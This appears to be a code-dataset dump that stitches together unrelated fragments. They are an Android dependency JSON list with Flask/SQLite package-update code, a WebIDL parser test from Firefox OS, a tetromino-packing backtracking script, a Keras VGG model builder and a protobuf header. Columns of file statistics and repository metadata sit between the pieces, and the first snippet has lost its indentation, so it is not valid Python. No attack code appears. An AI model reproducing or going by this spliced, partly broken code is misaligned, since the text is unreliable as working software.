,"name":"support-v4","currentVersion":"27.0.2"},{"group":"com.android.support.constraint","name":"constraint-layout","currentVersion":"1.1.0"},{"group":"uk.co.chrisjenx","name":"calligraphy","currentVersion":"2.3.0"},{"group":"com.neulion.android","name":"commonparser","currentVersion":"3.0.4"}]},{"package":"com.neulion.firetv.ufc.android.amazon.dev","packageName":"ufc-tv","productFlavorName":"prod","packageVersionCode":"103","packageVersionName":"8.0613","packageTargetSdk":"27","packageMiniSdk":"21","deepLinkScheme":"prod_ufctv","packageMappingUrl":"","libraryCoordinateList":[{"group":"com.android.tools.lint","name":"lint-gradle","currentVersion":"26.1.2"},{"group":"org.jetbrains.kotlin","name":"kotlin-annotation-processing-gradle","currentVersion":"1.2.41"},{"group":"com.crashlytics.sdk.android","name":"crashlytics","currentVersion":"2.8.0"},{"group":"com.squareup.leakcanary","name":"leakcanary-android","currentVersion":"1.5.4"},{"group":"com.squareup.leakcanary","name":"leakcanary-android-no-op","currentVersion":"1.5.4"},{"group":"org.jetbrains.kotlin","name":"kotlin-stdlib-jdk8","currentVersion":"1.2.41"},{"group":"com.google.android.gms","name":"play-services-analytics","currentVersion":"11.8.0"},{"group":"com.android.databinding","name":"baseLibrary","currentVersion":"3.1.2"},{"group":"com.neulion.android.app","name":"core","currentVersion":"0.5.3-SNAPSHOT"},{"group":"com.neulion.android.iap","name":"iap-amazon","currentVersion":"2.1.0-SNAPSHOT"},{"group":"android.arch.lifecycle","name":"extensions","currentVersion":"1.1.1"},{"group":"com.android.support","name":"support-annotations","currentVersion":"27.0.2"},{"group":"com.android.databinding","name":"adapters","currentVersion":"3.1.2"},{"group":"com.android.support","name":"recyclerview-v7","currentVersion":"27.0.2"},{"group":"com.jakewharton","name":"butterknife-compiler","currentVersion":"8.8.1"},{"group":"com.neulion.android","name":"service-v5","currentVersion":"3.0.12"},{"group":"com.android.databinding
","name":"library","currentVersion":"3.1.2"},{"group":"com.android.support","name":"appcompat-v7","currentVersion":"27.0.2"},{"group":"com.android.support","name":"leanback-v17","currentVersion":"27.0.2"},{"group":"com.android.databinding","name":"compiler","currentVersion":"3.1.2"},{"group":"com.jakewharton","name":"butterknife","currentVersion":"8.8.1"},{"group":"com.neulion.android.media","name":"NeuPlayer","currentVersion":"4.7.2-SNAPSHOT"},{"group":"com.android.support","name":"design","currentVersion":"27.0.2"},{"group":"com.android.support","name":"multidex-instrumentation","currentVersion":"1.0.2"},{"group":"com.android.support","name":"cardview-v7","currentVersion":"27.0.2"},{"group":"com.neulion.android.iap","name":"iap-google","currentVersion":"2.1.0-SNAPSHOT"},{"group":"com.neulion.android.tracking","name":"tracker-ga","currentVersion":"4.3.2"},{"group":"com.neulion.android","name":"uikit-fresco","currentVersion":"1.1.12-SNAPSHOT"},{"group":"com.neulion.android","name":"appengine","currentVersion":"2.4.0"},{"group":"com.android.support","name":"multidex","currentVersion":"1.0.2"},{"group":"com.android.support","name":"support-v4","currentVersion":"27.0.2"},{"group":"com.android.support.constraint","name":"constraint-layout","currentVersion":"1.1.0"},{"group":"uk.co.chrisjenx","name":"calligraphy","currentVersion":"2.3.0"},{"group":"com.neulion.android","name":"commonparser","currentVersion":"3.0.4"}]}]
print(type(tempdata))
print(len(tempdata))
for data in tempdata:
print(data)
print(type(data))
db = get_db()
error = None
if dict1['package'] is None:
error = 'Missing package'
elif dict1['packageName'] is None:
error = 'Missing packageName'
elif dict1['packageVersionCode'] is None:
error = 'Missing packageVersionCode'
elif dict1['libraryCoordinateList'] is None:
error = 'Missing Library info'
# if already exist just update.
elif db.execute(
'SELECT package, packageVersionName, productFlavorName FROM Package WHERE package = ? and '
'packageVersionName = ? and productFlavorName = ?',
(dict1['package'], dict1['packageVersionName'], dict1['productFlavorName'])).fetchone() is not None:
# print('Found')
db.execute(
'UPDATE Package SET packageName = ?, packageVersionCode = ?,productFlavorName = ?, packageTargetSdk = ?, '
'packageMiniSdk = ?, packageMappingUrl = ?, deepLinkScheme = ? WHERE package = ? and '
'packageVersionName = ?', (dict1['packageName'], dict1['packageVersionCode'], dict1['productFlavorName'],
dict1['packageTargetSdk'], dict1['packageMiniSdk'],
dict1['packageMappingUrl'], dict1['deepLinkScheme'], dict1['package'],
dict1['packageVersionName'])
)
db.execute(
'UPDATE Package SET date = datetime(\'now\', \'localtime\') WHERE package = ? and '
'packageVersionName = ?', (dict1['package'], dict1['packageVersionName'])
)
db.commit()
id = db.execute(
'select id from PackageLibrary WHERE package = ? and packageVersionName = ? and productFlavorName = ?',
(dict1['package'], dict1['packageVersionName'], dict1['productFlavorName']))
pids = [dict(id=row[0]) for row in id.fetchall()]
ids = []
for item in pids:
ids.append(item['id'])
# print(ids)
i = 0
for dict2 in dict1['libraryCoordinateList']:
db.execute(
'UPDATE PackageLibrary SET package = ?, packageName = ?, productFlavorName = ?, packageVersionName = ?, '
'libraryGroup = ?, libraryName = ?, libraryVersion = ? WHERE package = ? and '
'packageVersionName = ? and id = ?', (dict1['package'], dict1['packageName'], dict1['productFlavorName'],
dict1['packageVersionName'], dict2['group'],
dict2['name'], dict2['currentVersion'],
dict1['package'], dict1['packageVersionName'],
ids[i])
)
db.commit()
i = i + 1
# print('Update')
error = 'Project Info Updated'
# print(error)
# insert new data
| 142.090909
| 9,437
| 0.678183
| 1,483
| 12,504
| 5.715442
| 0.11261
| 0.084946
| 0.079637
| 0.077867
| 0.83412
| 0.807102
| 0.807102
| 0.807102
| 0.807102
| 0.807102
| 0
| 0.038409
| 0.06302
| 12,504
| 87
| 9,438
| 143.724138
| 0.685046
| 0.035029
| 0
| 0.090909
| 0
| 0
| 0.703322
| 0.140781
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.018182
| 0
| 0.018182
| 0.072727
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
6b6142b6243371bed9fd9e9b448dcf232f11c4b5
| 12,541
|
py
|
Python
|
B2G/gecko/dom/bindings/parser/tests/test_attr.py
|
wilebeast/FireFox-OS
|
43067f28711d78c429a1d6d58c77130f6899135f
|
[
"Apache-2.0"
] | 3
|
2015-08-31T15:24:31.000Z
|
2020-04-24T20:31:29.000Z
|
B2G/gecko/dom/bindings/parser/tests/test_attr.py
|
wilebeast/FireFox-OS
|
43067f28711d78c429a1d6d58c77130f6899135f
|
[
"Apache-2.0"
] | null | null | null |
B2G/gecko/dom/bindings/parser/tests/test_attr.py
|
wilebeast/FireFox-OS
|
43067f28711d78c429a1d6d58c77130f6899135f
|
[
"Apache-2.0"
] | 3
|
2015-07-29T07:17:15.000Z
|
2020-11-04T06:55:37.000Z
|
import WebIDL
def WebIDLTest(parser, harness):
testData = [("::TestAttr%s::b", "b", "Byte%s", False),
("::TestAttr%s::rb", "rb", "Byte%s", True),
("::TestAttr%s::o", "o", "Octet%s", False),
("::TestAttr%s::ro", "ro", "Octet%s", True),
("::TestAttr%s::s", "s", "Short%s", False),
("::TestAttr%s::rs", "rs", "Short%s", True),
("::TestAttr%s::us", "us", "UnsignedShort%s", False),
("::TestAttr%s::rus", "rus", "UnsignedShort%s", True),
("::TestAttr%s::l", "l", "Long%s", False),
("::TestAttr%s::rl", "rl", "Long%s", True),
("::TestAttr%s::ul", "ul", "UnsignedLong%s", False),
("::TestAttr%s::rul", "rul", "UnsignedLong%s", True),
("::TestAttr%s::ll", "ll", "LongLong%s", False),
("::TestAttr%s::rll", "rll", "LongLong%s", True),
("::TestAttr%s::ull", "ull", "UnsignedLongLong%s", False),
("::TestAttr%s::rull", "rull", "UnsignedLongLong%s", True),
("::TestAttr%s::str", "str", "String%s", False),
("::TestAttr%s::rstr", "rstr", "String%s", True),
("::TestAttr%s::obj", "obj", "Object%s", False),
("::TestAttr%s::robj", "robj", "Object%s", True),
("::TestAttr%s::object", "object", "Object%s", False),
("::TestAttr%s::f", "f", "Float%s", False),
("::TestAttr%s::rf", "rf", "Float%s", True)]
parser.parse("""
interface TestAttr {
attribute byte b;
readonly attribute byte rb;
attribute octet o;
readonly attribute octet ro;
attribute short s;
readonly attribute short rs;
attribute unsigned short us;
readonly attribute unsigned short rus;
attribute long l;
readonly attribute long rl;
attribute unsigned long ul;
readonly attribute unsigned long rul;
attribute long long ll;
readonly attribute long long rll;
attribute unsigned long long ull;
readonly attribute unsigned long long rull;
attribute DOMString str;
readonly attribute DOMString rstr;
attribute object obj;
readonly attribute object robj;
attribute object _object;
attribute float f;
readonly attribute float rf;
};
interface TestAttrNullable {
attribute byte? b;
readonly attribute byte? rb;
attribute octet? o;
readonly attribute octet? ro;
attribute short? s;
readonly attribute short? rs;
attribute unsigned short? us;
readonly attribute unsigned short? rus;
attribute long? l;
readonly attribute long? rl;
attribute unsigned long? ul;
readonly attribute unsigned long? rul;
attribute long long? ll;
readonly attribute long long? rll;
attribute unsigned long long? ull;
readonly attribute unsigned long long? rull;
attribute DOMString? str;
readonly attribute DOMString? rstr;
attribute object? obj;
readonly attribute object? robj;
attribute object? _object;
attribute float? f;
readonly attribute float? rf;
};
interface TestAttrArray {
attribute byte[] b;
readonly attribute byte[] rb;
attribute octet[] o;
readonly attribute octet[] ro;
attribute short[] s;
readonly attribute short[] rs;
attribute unsigned short[] us;
readonly attribute unsigned short[] rus;
attribute long[] l;
readonly attribute long[] rl;
attribute unsigned long[] ul;
readonly attribute unsigned long[] rul;
attribute long long[] ll;
readonly attribute long long[] rll;
attribute unsigned long long[] ull;
readonly attribute unsigned long long[] rull;
attribute DOMString[] str;
readonly attribute DOMString[] rstr;
attribute object[] obj;
readonly attribute object[] robj;
attribute object[] _object;
attribute float[] f;
readonly attribute float[] rf;
};
interface TestAttrNullableArray {
attribute byte[]? b;
readonly attribute byte[]? rb;
attribute octet[]? o;
readonly attribute octet[]? ro;
attribute short[]? s;
readonly attribute short[]? rs;
attribute unsigned short[]? us;
readonly attribute unsigned short[]? rus;
attribute long[]? l;
readonly attribute long[]? rl;
attribute unsigned long[]? ul;
readonly attribute unsigned long[]? rul;
attribute long long[]? ll;
readonly attribute long long[]? rll;
attribute unsigned long long[]? ull;
readonly attribute unsigned long long[]? rull;
attribute DOMString[]? str;
readonly attribute DOMString[]? rstr;
attribute object[]? obj;
readonly attribute object[]? robj;
attribute object[]? _object;
attribute float[]? f;
readonly attribute float[]? rf;
};
interface TestAttrArrayOfNullableTypes {
attribute byte?[] b;
readonly attribute byte?[] rb;
attribute octet?[] o;
readonly attribute octet?[] ro;
attribute short?[] s;
readonly attribute short?[] rs;
attribute unsigned short?[] us;
readonly attribute unsigned short?[] rus;
attribute long?[] l;
readonly attribute long?[] rl;
attribute unsigned long?[] ul;
readonly attribute unsigned long?[] rul;
attribute long long?[] ll;
readonly attribute long long?[] rll;
attribute unsigned long long?[] ull;
readonly attribute unsigned long long?[] rull;
attribute DOMString?[] str;
readonly attribute DOMString?[] rstr;
attribute object?[] obj;
readonly attribute object?[] robj;
attribute object?[] _object;
attribute float?[] f;
readonly attribute float?[] rf;
};
interface TestAttrNullableArrayOfNullableTypes {
attribute byte?[]? b;
readonly attribute byte?[]? rb;
attribute octet?[]? o;
readonly attribute octet?[]? ro;
attribute short?[]? s;
readonly attribute short?[]? rs;
attribute unsigned short?[]? us;
readonly attribute unsigned short?[]? rus;
attribute long?[]? l;
readonly attribute long?[]? rl;
attribute unsigned long?[]? ul;
readonly attribute unsigned long?[]? rul;
attribute long long?[]? ll;
readonly attribute long long?[]? rll;
attribute unsigned long long?[]? ull;
readonly attribute unsigned long long?[]? rull;
attribute DOMString?[]? str;
readonly attribute DOMString?[]? rstr;
attribute object?[]? obj;
readonly attribute object?[]? robj;
attribute object?[]? _object;
attribute float?[]? f;
readonly attribute float?[]? rf;
};
""")
results = parser.finish()
def checkAttr(attr, QName, name, type, readonly):
harness.ok(isinstance(attr, WebIDL.IDLAttribute),
"Should be an IDLAttribute")
harness.ok(attr.isAttr(), "Attr is an Attr")
harness.ok(not attr.isMethod(), "Attr is not an method")
harness.ok(not attr.isConst(), "Attr is not a const")
harness.check(attr.identifier.QName(), QName, "Attr has the right QName")
harness.check(attr.identifier.name, name, "Attr has the right name")
harness.check(str(attr.type), type, "Attr has the right type")
harness.check(attr.readonly, readonly, "Attr's readonly state is correct")
harness.ok(True, "TestAttr interface parsed without error.")
harness.check(len(results), 6, "Should be six productions.")
iface = results[0]
harness.ok(isinstance(iface, WebIDL.IDLInterface),
"Should be an IDLInterface")
harness.check(iface.identifier.QName(), "::TestAttr", "Interface has the right QName")
harness.check(iface.identifier.name, "TestAttr", "Interface has the right name")
harness.check(len(iface.members), len(testData), "Expect %s members" % len(testData))
attrs = iface.members
for i in range(len(attrs)):
data = testData[i]
attr = attrs[i]
(QName, name, type, readonly) = data
checkAttr(attr, QName % "", name, type % "", readonly)
iface = results[1]
harness.ok(isinstance(iface, WebIDL.IDLInterface),
"Should be an IDLInterface")
harness.check(iface.identifier.QName(), "::TestAttrNullable", "Interface has the right QName")
harness.check(iface.identifier.name, "TestAttrNullable", "Interface has the right name")
harness.check(len(iface.members), len(testData), "Expect %s members" % len(testData))
attrs = iface.members
for i in range(len(attrs)):
data = testData[i]
attr = attrs[i]
(QName, name, type, readonly) = data
checkAttr(attr, QName % "Nullable", name, type % "OrNull", readonly)
iface = results[2]
harness.ok(isinstance(iface, WebIDL.IDLInterface),
"Should be an IDLInterface")
harness.check(iface.identifier.QName(), "::TestAttrArray", "Interface has the right QName")
harness.check(iface.identifier.name, "TestAttrArray", "Interface has the right name")
harness.check(len(iface.members), len(testData), "Expect %s members" % len(testData))
attrs = iface.members
for i in range(len(attrs)):
data = testData[i]
attr = attrs[i]
(QName, name, type, readonly) = data
checkAttr(attr, QName % "Array", name, type % "Array", readonly)
iface = results[3]
harness.ok(isinstance(iface, WebIDL.IDLInterface),
"Should be an IDLInterface")
harness.check(iface.identifier.QName(), "::TestAttrNullableArray", "Interface has the right QName")
harness.check(iface.identifier.name, "TestAttrNullableArray", "Interface has the right name")
harness.check(len(iface.members), len(testData), "Expect %s members" % len(testData))
attrs = iface.members
for i in range(len(attrs)):
data = testData[i]
attr = attrs[i]
(QName, name, type, readonly) = data
checkAttr(attr, QName % "NullableArray", name, type % "ArrayOrNull", readonly)
iface = results[4]
harness.ok(isinstance(iface, WebIDL.IDLInterface),
"Should be an IDLInterface")
harness.check(iface.identifier.QName(), "::TestAttrArrayOfNullableTypes", "Interface has the right QName")
harness.check(iface.identifier.name, "TestAttrArrayOfNullableTypes", "Interface has the right name")
harness.check(len(iface.members), len(testData), "Expect %s members" % len(testData))
attrs = iface.members
for i in range(len(attrs)):
data = testData[i]
attr = attrs[i]
(QName, name, type, readonly) = data
checkAttr(attr, QName % "ArrayOfNullableTypes", name, type % "OrNullArray", readonly)
iface = results[5]
harness.ok(isinstance(iface, WebIDL.IDLInterface),
"Should be an IDLInterface")
harness.check(iface.identifier.QName(), "::TestAttrNullableArrayOfNullableTypes", "Interface has the right QName")
harness.check(iface.identifier.name, "TestAttrNullableArrayOfNullableTypes", "Interface has the right name")
harness.check(len(iface.members), len(testData), "Expect %s members" % len(testData))
attrs = iface.members
for i in range(len(attrs)):
data = testData[i]
attr = attrs[i]
(QName, name, type, readonly) = data
checkAttr(attr, QName % "NullableArrayOfNullableTypes", name, type % "OrNullArrayOrNull", readonly)
parser = parser.reset()
threw = False
try:
parser.parse("""
interface A {
[SetterInfallible] readonly attribute boolean foo;
};
""")
results = parser.finish()
except Exception, x:
threw = True
harness.ok(threw, "Should not allow [SetterInfallible] on readonly attributes")
| 41.389439
| 118
| 0.58839
| 1,312
| 12,541
| 5.619665
| 0.096037
| 0.154483
| 0.068358
| 0.024413
| 0.769565
| 0.730774
| 0.716533
| 0.716533
| 0.716533
| 0.716533
| 0
| 0.000785
| 0.288813
| 12,541
| 302
| 119
| 41.52649
| 0.825877
| 0
| 0
| 0.222628
| 0
| 0
| 0.631848
| 0.023044
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.00365
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b9751b50b6295f2007b03754c615fad69738adc
| 12,378
|
py
|
Python
|
sasuke 34/J.py
|
conganhhcmus/Codelearn.io
|
cb698924fe9eac27fb8b2cef4e03c7619cb4fe81
|
[
"MIT"
] | null | null | null |
sasuke 34/J.py
|
conganhhcmus/Codelearn.io
|
cb698924fe9eac27fb8b2cef4e03c7619cb4fe81
|
[
"MIT"
] | null | null | null |
sasuke 34/J.py
|
conganhhcmus/Codelearn.io
|
cb698924fe9eac27fb8b2cef4e03c7619cb4fe81
|
[
"MIT"
] | null | null | null |
a = arr = [[False for i in range(100)] for j in range(100)]
ans = 0
sl = 0
block= []
def findLargestRectangle(blockNumber):
global sl
global block
block = blockNumber
for i in block: sl += i
for i in range(1,9):
find(i, 1)
return ans
def find(r,n):
global ans
global a
# calc result
if (((n - 1) * 4) % r == 0):
l = (n - 1) * 4 // r
check = True
for i in range(l):
for j in range(r):
if (not a[i][j]):
check = False
break
if (not check): break
if (check and ans < (n-1)*4):
ans = (n-1)*4
# condition end
if (n > sl): return
#fill - backtracking
for i in range(80):
for j in range(r):
if (not a[i][j]):
if (block[0] > 0):
if (not a[i + 1][j] and not a[i + 2][j] and not a[i + 3][j]):
a[i][j] = True
a[i + 1][j] = True
a[i + 2][j] = True
a[i + 3][j] = True
block[0]-=1
find(r, n + 1)
a[i][j] = False
a[i + 1][j] = False
a[i + 2][j] = False
a[i + 3][j] = False
block[0]+=1
if (j + 3 < r and not a[i][j + 1] and not a[i][j + 2] and not a[i][j + 3]):
a[i][j] = True
a[i][j + 1] = True
a[i][j + 2] = True
a[i][j + 3] = True
block[0]-=1
find(r, n + 1)
a[i][j] = False
a[i][j + 1] = False
a[i][j + 2] = False
a[i][j + 3] = False
block[0]+=1
if (block[1] > 0):
if (j + 1 < r and not a[i][j + 1] and not a[i + 1][j] and not a[i + 1][j + 1]):
a[i][j] = True
a[i][j + 1] = True
a[i + 1][j] = True
a[i + 1][j + 1] = True
block[1]-=1
find(r, n + 1)
a[i][j] = False
a[i][j + 1] = False
a[i + 1][j] = False
a[i + 1][j + 1] = False
block[1]+=1
if (block[2] > 0):
if (j + 2 < r and not a[i][j + 1] and not a[i][j + 2] and not a[i + 1][j + 2]):
a[i][j] = True
a[i][j + 1] = True
a[i][j + 2] = True
a[i + 1][j + 2] = True
block[2]-=1
find(r, n + 1)
a[i][j] = False
a[i][j + 1] = False
a[i][j + 2] = False
a[i + 1][j + 2] = False
block[2]+=1
if (j + 1 < r and not a[i][j + 1] and not a[i + 1][j] and not a[i + 2][j]):
a[i][j] = True
a[i][j + 1] = True
a[i + 1][j] = True
a[i + 2][j] = True
block[2]-=1
find(r, n + 1)
a[i][j] = False
a[i][j + 1] = False
a[i + 1][j] = False
a[i + 2][j] = False
block[2]+=1
if (j + 2 < r and not a[i + 1][j] and not a[i + 1][j + 1] and not a[i + 1][j + 2]):
a[i][j] = True
a[i + 1][j] = True
a[i + 1][j + 1] = True
a[i + 1][j + 2] = True
block[2]-=1
find(r, n + 1)
a[i][j] = False
a[i + 1][j] = False
a[i + 1][j + 1] = False
a[i + 1][j + 2] = False
block[2]+=1
if (j > 0):
if (not a[i + 1][j] and not a[i + 2][j] and not a[i + 2][j - 1]):
a[i][j] = True
a[i + 1][j] = True
a[i + 2][j] = True
a[i + 2][j - 1] = True
block[2]-=1
find(r, n + 1)
a[i][j] = False
a[i + 1][j] = False
a[i + 2][j] = False
a[i + 2][j - 1] = False
block[2]+=1
if (block[3] > 0):
if (j + 2 < r and not a[i][j + 1] and not a[i + 1][j + 1] and not a[i + 1][j + 2]):
a[i][j] = True
a[i][j + 1] = True
a[i + 1][j + 1] = True
a[i + 1][j + 2] = True
block[3]-=1
find(r, n + 1)
a[i][j] = False
a[i][j + 1] = False
a[i + 1][j + 1] = False
a[i + 1][j + 2] = False
block[3]+=1
if (j > 0):
if (not a[i + 1][j] and not a[i + 1][j - 1] and not a[i + 2][j - 1]):
a[i][j] = True
a[i + 1][j] = True
a[i + 1][j - 1] = True
a[i + 2][j - 1] = True
block[3]-=1
find(r, n + 1)
a[i][j] = False
a[i + 1][j] = False
a[i + 1][j - 1] = False
a[i + 2][j - 1] = False
block[3]+=1
if (block[4] > 0):
if (j + 1 < r and j > 0):
if(not a[i][j + 1] and not a[i + 1][j] and not a[i + 1][j - 1]):
a[i][j] = True
a[i][j + 1] = True
a[i + 1][j] = True
a[i + 1][j - 1] = True
block[4]-=1
find(r, n + 1)
a[i][j] = False
a[i][j + 1] = False
a[i + 1][j] = False
a[i + 1][j - 1] = False
block[4]+=1
if (j + 1 < r):
if (not a[i + 1][j] and not a[i + 1][j + 1] and not a[i + 2][j + 1]):
a[i][j] = True
a[i + 1][j] = True
a[i + 1][j + 1] = True
a[i + 2][j + 1] = True
block[4]-=1
find(r, n + 1)
a[i][j] = False
a[i + 1][j] = False
a[i + 1][j + 1] = False
a[i + 2][j + 1] = False
block[4]+=1
if (block[5] > 0):
if (j + 2 < r and not a[i][j + 1] and not a[i][j + 2] and not a[i + 1][j]):
a[i][j] = True
a[i][j + 1] = True
a[i][j + 2] = True
a[i + 1][j] = True
block[5]-=1
find(r, n + 1)
a[i][j] = False
a[i][j + 1] = False
a[i][j + 2] = False
a[i + 1][j] = False
block[5]+=1
if (j + 1 < r and not a[i][j + 1] and not a[i + 1][j + 1] and not a[i + 2][j + 1]):
a[i][j] = True
a[i][j + 1] = True
a[i + 1][j + 1] = True
a[i + 2][j + 1] = True
block[5]-=1
find(r, n + 1)
a[i][j] = False
a[i][j + 1] = False
a[i + 1][j + 1] = False
a[i + 2][j + 1] = False
block[5]+=1
if (j > 1):
if(not a[i + 1][j] and not a[i + 1][j - 1] and not a[i + 1][j - 2]):
a[i][j] = True
a[i + 1][j] = True
a[i + 1][j - 1] = True
a[i + 1][j - 2] = True
block[5]-=1
find(r, n + 1)
a[i][j] = False
a[i + 1][j] = False
a[i + 1][j - 1] = False
a[i + 1][j - 2] = False
block[5]+=1
if (j + 1 < r):
if (not a[i + 1][j] and not a[i + 2][j] and not a[i + 2][j + 1]):
a[i][j] = True
a[i + 1][j] = True
a[i + 2][j] = True
a[i + 2][j + 1] = True
block[5]-=1
find(r, n + 1)
a[i][j] = False
a[i + 1][j] = False
a[i + 2][j] = False
a[i + 2][j + 1] = False
block[5]+=1
if (block[6] > 0):
if (j + 2 < r and not a[i][j + 1] and not a[i][j + 2] and not a[i + 1][j + 1]):
a[i][j] = True
a[i][j + 1] = True
a[i][j + 2] = True
a[i + 1][j + 1] = True
block[6]-=1
find(r, n + 1)
a[i][j] = False
a[i][j + 1] = False
a[i][j + 2] = False
a[i + 1][j + 1] = False
block[6]+=1
if (j + 1 < r and not a[i + 1][j] and not a[i + 1][j + 1] and not a[i + 2][j]):
a[i][j] = True
a[i + 1][j] = True
a[i + 1][j + 1] = True
a[i + 2][j] = True
block[6]-=1
find(r, n + 1)
a[i][j] = False
a[i + 1][j] = False
a[i + 1][j + 1] = False
a[i + 2][j] = False
block[6]+=1
if (j > 0):
if (not a[i + 1][j] and not a[i + 1][j - 1] and not a[i + 2][j]):
a[i][j] = True
a[i + 1][j] = True
a[i + 1][j - 1] = True
a[i + 2][j] = True
block[6]-=1
find(r, n + 1)
a[i][j] = False
a[i + 1][j] = False
a[i + 1][j - 1] = False
a[i + 2][j] = False
block[6]+=1
if (j + 1 < r and j > 0):
if(not a[i + 1][j] and not a[i + 1][j + 1] and not a[i + 1][j - 1]):
a[i][j] = True
a[i + 1][j] = True
a[i + 1][j - 1] = True
a[i + 1][j + 1] = True
block[6]-=1
find(r, n + 1)
a[i][j] = False
a[i + 1][j] = False
a[i + 1][j - 1] = False
a[i + 1][j + 1] = False
block[6]+=1
return
print(findLargestRectangle([0,0,1,1,0,1,0]))
| 42.979167
| 103
| 0.230166
| 1,555
| 12,378
| 1.832154
| 0.027653
| 0.148122
| 0.097929
| 0.130572
| 0.848719
| 0.835381
| 0.833977
| 0.829765
| 0.824149
| 0.822745
| 0
| 0.086339
| 0.630393
| 12,378
| 287
| 104
| 43.12892
| 0.536393
| 0.003555
| 0
| 0.770909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007273
| false
| 0
| 0
| 0
| 0.014545
| 0.003636
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
6ba14f388ea2cd8e378e871024edd16eb5c1b8c8
| 4,462
|
py
|
Python
|
vgg/vgg.py
|
amir-saniyan/KerasNets
|
6031fd19b81a41422a3fea65d793509bac01092f
|
[
"MIT"
] | null | null | null |
vgg/vgg.py
|
amir-saniyan/KerasNets
|
6031fd19b81a41422a3fea65d793509bac01092f
|
[
"MIT"
] | null | null | null |
vgg/vgg.py
|
amir-saniyan/KerasNets
|
6031fd19b81a41422a3fea65d793509bac01092f
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
def build_model(configuration='vgg19', input_shape=(224, 224, 3), num_classes=1000, dropout_rate=0.5):
    """Build a VGG convolutional network as a Keras functional model.

    The five convolutional stages use 3x3 'same' convolutions followed by a
    2x2 max-pool; the per-stage convolution counts are what distinguish the
    configurations (VGG-11/13/16/19, per Simonyan & Zisserman, 2014). The
    classifier head is Flatten -> Dense(4096) -> Dropout -> Dense(4096) ->
    Dropout -> Dense(num_classes, softmax).

    Args:
        configuration: One of 'vgg11', 'vgg13', 'vgg16', 'vgg19'.
        input_shape: Input tensor shape, channels-last (default 224x224x3).
        num_classes: Number of output classes for the softmax head.
        dropout_rate: Dropout rate applied after each 4096-unit Dense layer.

    Returns:
        A ``tf.keras.Model`` mapping the input image to class probabilities.

    Raises:
        ValueError: If ``configuration`` is not a recognized VGG variant.
    """
    # Number of 3x3 conv layers in each of the five stages; the stage filter
    # widths are fixed at 64, 128, 256, 512, 512 for every configuration.
    conv_counts = {
        'vgg11': (1, 1, 2, 2, 2),
        'vgg13': (2, 2, 2, 2, 2),
        'vgg16': (2, 2, 3, 3, 3),
        'vgg19': (2, 2, 4, 4, 4),
    }
    if configuration not in conv_counts:
        # ValueError (a subclass of Exception) is the idiomatic type for a
        # bad argument value; existing callers catching Exception still work.
        raise ValueError('Configuration should be one of these values: vgg11, vgg13, vgg16, vgg19')

    inputs = tf.keras.Input(shape=input_shape)
    x = inputs
    for num_convs, filters in zip(conv_counts[configuration], (64, 128, 256, 512, 512)):
        for _ in range(num_convs):
            x = tf.keras.layers.Conv2D(filters=filters, kernel_size=(3, 3), strides=1, padding='same',
                                       activation=tf.keras.activations.relu)(x)
        x = tf.keras.layers.MaxPooling2D(pool_size=(2, 2), strides=2, padding='valid')(x)

    x = tf.keras.layers.Flatten()(x)
    x = tf.keras.layers.Dense(units=4096, activation=tf.keras.activations.relu)(x)
    x = tf.keras.layers.Dropout(rate=dropout_rate)(x)
    x = tf.keras.layers.Dense(units=4096, activation=tf.keras.activations.relu)(x)
    x = tf.keras.layers.Dropout(rate=dropout_rate)(x)
    outputs = tf.keras.layers.Dense(units=num_classes, activation=tf.keras.layers.Softmax())(x)

    return tf.keras.models.Model(inputs=inputs, outputs=outputs)
| 49.032967
| 102
| 0.607127
| 575
| 4,462
| 4.66087
| 0.114783
| 0.125373
| 0.135821
| 0.135821
| 0.865672
| 0.85709
| 0.85709
| 0.85709
| 0.85709
| 0.85709
| 0
| 0.058685
| 0.240027
| 4,462
| 90
| 103
| 49.577778
| 0.731643
| 0
| 0
| 0.827586
| 0
| 0
| 0.05827
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017241
| false
| 0
| 0.017241
| 0
| 0.051724
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6bdaa8c6396ce9b1f3be8da8a1f72271f9224e4a
| 62,996
|
py
|
Python
|
demo/adif_pb2.py
|
k0swe/adif-json-protobuf
|
90cc62e38919611754e0dca15498d0444d6d5871
|
[
"Apache-2.0"
] | 3
|
2020-10-08T16:11:59.000Z
|
2021-08-06T05:13:36.000Z
|
demo/adif_pb2.py
|
k0swe/adif-json-protobuf
|
90cc62e38919611754e0dca15498d0444d6d5871
|
[
"Apache-2.0"
] | 4
|
2020-10-18T00:47:19.000Z
|
2021-08-18T23:27:58.000Z
|
demo/adif_pb2.py
|
k0swe/adif-json-protobuf
|
90cc62e38919611754e0dca15498d0444d6d5871
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: adif.proto
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
